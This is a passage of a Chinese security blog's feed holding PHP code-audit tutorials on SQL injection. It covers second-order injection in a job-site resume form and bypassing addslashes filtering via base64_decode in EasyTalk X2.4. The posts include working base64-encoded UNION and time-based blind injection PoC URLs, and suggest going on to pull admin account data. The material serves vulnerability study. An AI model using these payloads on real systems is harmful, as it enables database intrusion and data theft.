class=&quot;variable&quot;&gt;$percent&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;complete&#39;&lt;/span&gt;] = &lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$resume_work&lt;/span&gt; = get_resume_work(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$resume_training&lt;/span&gt; = get_resume_training(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$resume_photo&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo_img&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_work&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;13&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_training&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;13&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_photo&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;14&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;complete&#39;&lt;/span&gt;] = &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;complete_percent&#39;&lt;/span&gt;] = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt;(QISHI_ROOT_PATH . &lt;span class=&quot;string&quot;&gt;&#39;include/splitword.class.php&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$sp&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; SPWord();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;] = &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;intention_jobs&#39;&lt;/span&gt;] . &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;recentjobs&#39;&lt;/span&gt;] . &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;specialty&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;] = &lt;span class=&quot;string&quot;&gt;&quot;&amp;#123;$resume_basic[&#39;fullname&#39;]&amp;#125; &quot;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$sp&lt;/span&gt;-&amp;gt;extracttag(&lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;string&quot;&gt;&quot;,&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot; &quot;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;intention_jobs&#39;&lt;/span&gt;]) . &lt;span class=&quot;string&quot;&gt;&quot; &amp;#123;$setsqlarr[&#39;key&#39;]&amp;#125; &amp;#123;$resume_basic[&#39;education_cn&#39;]&amp;#125;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;] = &lt;span class=&quot;variable&quot;&gt;$sp&lt;/span&gt;-&amp;gt;pad(&lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;comment&quot;&gt;//遍历教育经历所有字段，加入到数组里&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$li&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;] = &lt;span class=&quot;string&quot;&gt;&quot;&amp;#123;$li[&#39;school&#39;]&amp;#125; &amp;#123;$setsqlarr[&#39;key&#39;]&amp;#125; &amp;#123;$li[&#39;speciality&#39;]&amp;#125;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;refreshtime&#39;&lt;/span&gt;] = &lt;span class=&quot;variable&quot;&gt;$timestamp&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//这里对教育经历做了次更新操作，二次注入由此产生！&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    updatetable(table(&lt;span class=&quot;string&quot;&gt;&#39;resume&#39;&lt;/span&gt;), &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;uid=&#39;&amp;#123;$uid&amp;#125;&#39; AND id=&#39;&amp;#123;$pid&amp;#125;&#39;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    updatetable(table(&lt;span class=&quot;string&quot;&gt;&#39;resume_tmp&#39;&lt;/span&gt;), &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;uid=&#39;&amp;#123;$uid&amp;#125;&#39; AND id=&#39;&amp;#123;$pid&amp;#125;&#39;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;3.我们填写一份简历简单试验下，在教育经历处学校名称字段填写aa’&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_04.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;保存后发现报错语句：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_05.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x04_漏洞证明&quot;&gt;0x04 漏洞证明&lt;/h2&gt;&lt;p&gt;构造获取数据库用户相关信息的POC：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_06.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;查看简历发现简历姓名变成了root@localhost:&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_07.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;查看sql语句发现更新语句是成功执行的：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_08.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;最后，有兴趣的同学可以继续获取其它的管理员账户等相关字段的信息。&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/02/19/sql3/&quot;&gt;http://www.cnbraid.com/2016/02/19/sql3/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。二次注入也是一种比较常见的注入，它涉及到入库和出库。因为有全局转义所以入库的时候：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Insert into table (username) values (‘hack\’’);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;这样入库后转义符就会消失变成了hack’，这样如果hack’出库被带入查询的话就会成功的引入了单引号导致注入。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-068362&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-068362&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass2.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode</title>
    <link href="http://www.cnbraid.com/2016/02/18/sql2/"/>
    <id>http://www.cnbraid.com/2016/02/18/sql2/</id>
    <published>2016-02-18T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:39.308Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。同上一篇，我们需要找一些编码解码的函数来绕过全局防护，本篇介绍base64decode()的情况。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-050338&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-050338&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;看背景我们使用了低版本的easytalk程序，版本为X2.4&lt;br&gt;①源码我打包了一份：&lt;a href=&quot;http://pan.baidu.com/s/1bopOFNL&quot; title=&quot;easytalk.zip&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pan.baidu.com/s/1bopOFNL&lt;/a&gt;&lt;br&gt;②解压到www的easytalk目录下，按照提示一步步安装即可，遇到问题自行百度或谷歌，成功后访问如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_2.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;p&gt;首先看下源码结构，用的ThinkPHP框架，比较复杂：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_3.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;有兴趣的可以去研究下再继续往下看，新手可以知道ThinkPHP对接收的参数是有过滤的，并且根据你服务器是否开启GPC会做相应的处理：&lt;br&gt;1./ThinkPHP/Extend/Library/ORG/Util/Input.class.php文件第266行:&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;+----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * 如果 magic_quotes_gpc 为关闭状态，这个函数可以转义字符串&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;+----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@access&lt;/span&gt; public&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;+----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@param&lt;/span&gt; string $string 要处理的字符串&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;+----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@return&lt;/span&gt; string&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;+----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;static&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;addSlashes&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!get_magic_quotes_gpc()) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt; = addslashes(&lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;2.使用Seay代码审计系统的全局搜索功能，搜索包含关键字为”base64_decode”的文件，发现SettingAction.class.php包含一个对接收的参数auth进行base64_decode的地方：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql02_04.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;3.我们跟进这个php文件，发现虽然使用daddslashes函数进行了注入过滤，但是使用了base64_decode函数对参数auth进行了转码从而可以绕过过滤造成注入：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//认证电子邮件&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;doauth&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$_authmsg&lt;/span&gt;=daddslashes(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;auth&#39;&lt;/span&gt;]);&lt;span class=&quot;comment&quot;&gt;//再次判断GPC是否开启并进行注入过滤&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$authmsg&lt;/span&gt;=base64_decode(&lt;span class=&quot;variable&quot;&gt;$_authmsg&lt;/span&gt;);&lt;span class=&quot;comment&quot;&gt;//base64_decode函数对参数进行转码处理&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$tem&lt;/span&gt;=explode(&lt;span class=&quot;string&quot;&gt;&quot;:&quot;&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$authmsg&lt;/span&gt;);&lt;span class=&quot;comment&quot;&gt;//对解码后的参数authmsg按照“：”进行分割存入数组tem中&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$send_id&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$tem&lt;/span&gt;[&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$user&lt;/span&gt;=M(&lt;span class=&quot;string&quot;&gt;&#39;Users&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$row&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$user&lt;/span&gt;-&amp;gt;field(&lt;span class=&quot;string&quot;&gt;&#39;mailadres,auth_email&#39;&lt;/span&gt;)-&amp;gt;where(&lt;span class=&quot;string&quot;&gt;&quot;user_id=&#39;$send_id&#39;&quot;&lt;/span&gt;)-&amp;gt;find();&lt;span class=&quot;comment&quot;&gt;//带入查询，在where子句里，造成注入&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$_authmsg&lt;/span&gt;==&lt;span class=&quot;variable&quot;&gt;$row&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;auth_email&#39;&lt;/span&gt;]) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$user&lt;/span&gt;-&amp;gt;where(&lt;span class=&quot;string&quot;&gt;&quot;user_id=&#39;$send_id&#39;&quot;&lt;/span&gt;)-&amp;gt;setField(&lt;span class=&quot;string&quot;&gt;&#39;auth_email&#39;&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        setcookie(&lt;span class=&quot;string&quot;&gt;&#39;setok&#39;&lt;/span&gt;, json_encode(&lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;lang&#39;&lt;/span&gt;=&amp;gt;L(&lt;span class=&quot;string&quot;&gt;&#39;mail6&#39;&lt;/span&gt;),&lt;span class=&quot;string&quot;&gt;&#39;ico&#39;&lt;/span&gt;=&amp;gt;&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;)),&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&#39;/&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        setcookie(&lt;span class=&quot;string&quot;&gt;&#39;setok&#39;&lt;/span&gt;, json_encode(&lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;lang&#39;&lt;/span&gt;=&amp;gt;L(&lt;span class=&quot;string&quot;&gt;&#39;mail7&#39;&lt;/span&gt;),&lt;span class=&quot;string&quot;&gt;&#39;ico&#39;&lt;/span&gt;=&amp;gt;&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;)),&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&#39;/&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    header(&lt;span class=&quot;string&quot;&gt;&#39;location:&#39;&lt;/span&gt;.SITE_URL.&lt;span class=&quot;string&quot;&gt;&#39;/?m=setting&amp;amp;a=mailauth&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x04_漏洞证明&quot;&gt;0x04 漏洞证明&lt;/h2&gt;&lt;p&gt;构造获取数据库相关信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;string&quot;&gt;http:&lt;/span&gt;&lt;span class=&quot;comment&quot;&gt;//localhost/eazytalk/?m=setting&amp;amp;a=doauth&amp;amp;auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;查看sql语句发现成功执行：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql02_05.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;发现这里是一个盲注，并没有输出，所以我们使用sql盲注的语句。获取当前数据库用户名的第一个字符是不是‘r’（ascii值为114）的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;string&quot;&gt;http:&lt;/span&gt;&lt;span class=&quot;comment&quot;&gt;//localhost/eazytalk/?m=index&amp;amp;a=mailactivity&amp;amp;auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM=&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;页面持续了5秒，说明user()的第一个字符为‘r’，查看sql语句发现成功执行：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql2_1.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;最后，有兴趣的同学可以自己写个py脚本来跑这种盲注。&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/02/18/sql2/&quot;&gt;http://www.cnbraid.com/2016/02/18/sql2/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。同上一篇，我们需要找一些编码解码的函数来绕过全局防护，本篇介绍base64decode()的情况。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-050338&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-050338&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode</title>
    <link href="http://www.cnbraid.com/2015/12/24/sql1/"/>
    <id>http://www.cnbraid.com/2015/12/24/sql1/</id>
    <published>2015-12-24T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:46.893Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。遇到这种情况我们就需要找一些编码解码的函数来绕过全局防护，这篇文章讲urldecode()的情况，同样大牛请自觉绕道~&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-050338&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-050338&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
